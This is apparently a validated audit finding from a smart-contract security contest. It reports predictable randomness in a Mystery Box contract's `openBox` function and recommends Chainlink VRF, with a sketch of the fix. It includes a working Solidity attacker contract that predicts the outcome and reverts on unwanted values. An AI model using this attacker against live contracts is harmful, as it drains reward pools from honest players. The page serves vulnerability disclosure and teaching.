Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: medium
Valid

Broken randomness in `openBox` function

Summary

`openBox` derives its "random" number by hashing `block.timestamp` and `msg.sender` and taking the result modulo 100. Both inputs are known to the caller before the transaction executes, so the number is predictable, not random.

uint256 randomValue = uint256(
keccak256(abi.encodePacked(block.timestamp, msg.sender))
) % 100;

Both inputs to the hash are known in advance: `msg.sender` is the caller's own address, and `block.timestamp` is the same for every call in the block, so an attacker contract that calls `openBox` in the same transaction sees exactly the value the target will use. Anyone can therefore run the same `keccak256` and `% 100` first and only let the call go through when the result lands in the bucket that pays the highest reward.
For illustration only (this decimal value is not a real keccak output, just a large number): if the hash were 1234567890123456789012345678901234567890, then `% 100` keeps its last two digits, so `randomValue` would be 90, and the attacker knows that before calling. The modulo only shrinks the range to 0..99; it adds no unpredictability.

Impact

A malicious user can predict the number and call `openBox` only when it yields the highest reward, winning every time and draining the reward pool at the expense of honest players.
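As an added example (not part of the original submission or of the Mystery Box code), the attacker contract below shows how the prediction is used in practice. The `IMysteryBox` interface and the `openBox()` signature are assumptions, and the `lo`/`hi` bucket bounds are placeholders: the real contract's signature, any purchase step it requires, and its reward thresholds must be taken from its source.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Assumed interface for the target; the real MysteryBox signature may differ
// (it may require a box to be bought first, or take a payment).
interface IMysteryBox {
    function openBox() external;
}

// Added example attacker: opens a box only when the target's "random" value,
// recomputed here with the same formula, falls in the wanted reward bucket.
contract PredictOpenBox {
    IMysteryBox public immutable box;
    address public immutable owner;

    constructor(IMysteryBox _box) {
        box = _box;
        owner = msg.sender;
    }

    // Mirrors the vulnerable line in openBox. When this contract is the caller,
    // msg.sender inside the target is address(this), and block.timestamp is
    // constant for the whole transaction, so the result is known before the call.
    function predict() public view returns (uint256) {
        return uint256(keccak256(abi.encodePacked(block.timestamp, address(this)))) % 100;
    }

    // Tries to open a box whose value lands in [lo, hi] (e.g. the top-reward bucket).
    // A miss reverts the whole transaction: the attacker pays only gas and resubmits
    // in a later block; a hit opens the box with the desired outcome.
    function attack(uint256 lo, uint256 hi) external {
        require(msg.sender == owner, "not owner");
        uint256 v = predict();
        require(v >= lo && v <= hi, "unwanted value, retry next block");
        box.openBox();
    }
}
```

Because the target credits the reward to `msg.sender`, which here is the attacker contract, a real attack also needs a withdrawal path matching the target's reward mechanism; that part is omitted because the page does not describe it. The revert-on-miss pattern is what makes the attack free to repeat: no state changes unless the outcome is the one the attacker wants.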

Tools Used

Manual.

Recommendations

Randomness considerations: a hash of `block.timestamp` and `msg.sender` is fully determined by values the caller can read or control, so it is not a source of randomness at all, let alone a cryptographically secure one. Use an oracle-based source such as Chainlink VRF, where the random word arrives in a callback the caller cannot influence, or at minimum a commit-reveal scheme so the outcome is fixed before any party can see it. Replacing `block.timestamp` with `blockhash` or `block.prevrandao` alone is not enough: those values are also visible on-chain and can be influenced by block producers.
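As an added example (not the project's code), the sketch below splits `openBox` into a request and a Chainlink VRF v2 callback so the outcome is decided by a random word the caller never sees in advance. The coordinator address, `keyHash`, subscription id, the `boxesOwned` bookkeeping and the `lastRandomValue` result storage are assumptions; the import paths are those of the v2 `@chainlink/contracts` package and may differ between package versions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Import paths assumed from the Chainlink VRF v2 consumer package; check the installed version.
import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/vrf/VRFConsumerBaseV2.sol";
import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/vrf/interfaces/VRFCoordinatorV2Interface.sol";

// Added example: the box outcome comes from a VRF random word delivered in a
// callback after the request transaction is mined, not from on-chain inputs.
contract MysteryBoxVRF is VRFConsumerBaseV2 {
    VRFCoordinatorV2Interface private immutable coordinator;
    bytes32 private immutable keyHash;          // gas lane, per network (assumed)
    uint64 private immutable subscriptionId;    // funded VRF subscription (assumed)
    uint32 private constant CALLBACK_GAS_LIMIT = 200_000;
    uint16 private constant REQUEST_CONFIRMATIONS = 3;

    mapping(uint256 => address) public requestToPlayer;   // requestId => player who opened the box
    mapping(address => uint256) public boxesOwned;        // assumed purchase bookkeeping
    mapping(address => uint256) public lastRandomValue;   // 0..99 result of the player's last box

    event BoxOpened(address indexed player, uint256 randomValue);

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subId)
        VRFConsumerBaseV2(_coordinator)
    {
        coordinator = VRFCoordinatorV2Interface(_coordinator);
        keyHash = _keyHash;
        subscriptionId = _subId;
    }

    // Step 1: consume the box and ask the coordinator for one random word.
    // Nothing about the outcome is decided here, so there is nothing to predict
    // and nothing for a caller contract to revert on.
    function openBox() external returns (uint256 requestId) {
        require(boxesOwned[msg.sender] > 0, "no box");
        boxesOwned[msg.sender] -= 1;
        requestId = coordinator.requestRandomWords(
            keyHash, subscriptionId, REQUEST_CONFIRMATIONS, CALLBACK_GAS_LIMIT, 1
        );
        requestToPlayer[requestId] = msg.sender;
    }

    // Step 2: only the coordinator can reach this (VRFConsumerBaseV2.rawFulfillRandomWords
    // checks msg.sender). The player is not the caller, so they cannot retry or revert it.
    function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {
        address player = requestToPlayer[requestId];
        require(player != address(0), "unknown request");
        delete requestToPlayer[requestId];
        uint256 randomValue = randomWords[0] % 100;
        lastRandomValue[player] = randomValue;
        emit BoxOpened(player, randomValue);
        // Apply the project's reward tiers to randomValue here; the thresholds are
        // not given on this page, so they are left to the actual implementation.
    }
}
```

Two points matter for this design: the callback must never revert (an unclaimed reward should be recorded, not reverted, or the random word is lost), and the request and fulfilment happen in different transactions, so the revert-on-miss trick used against the original `openBox` no longer applies.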

Updates

Appeal created

inallhonesty Lead Judge 8 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Randomness
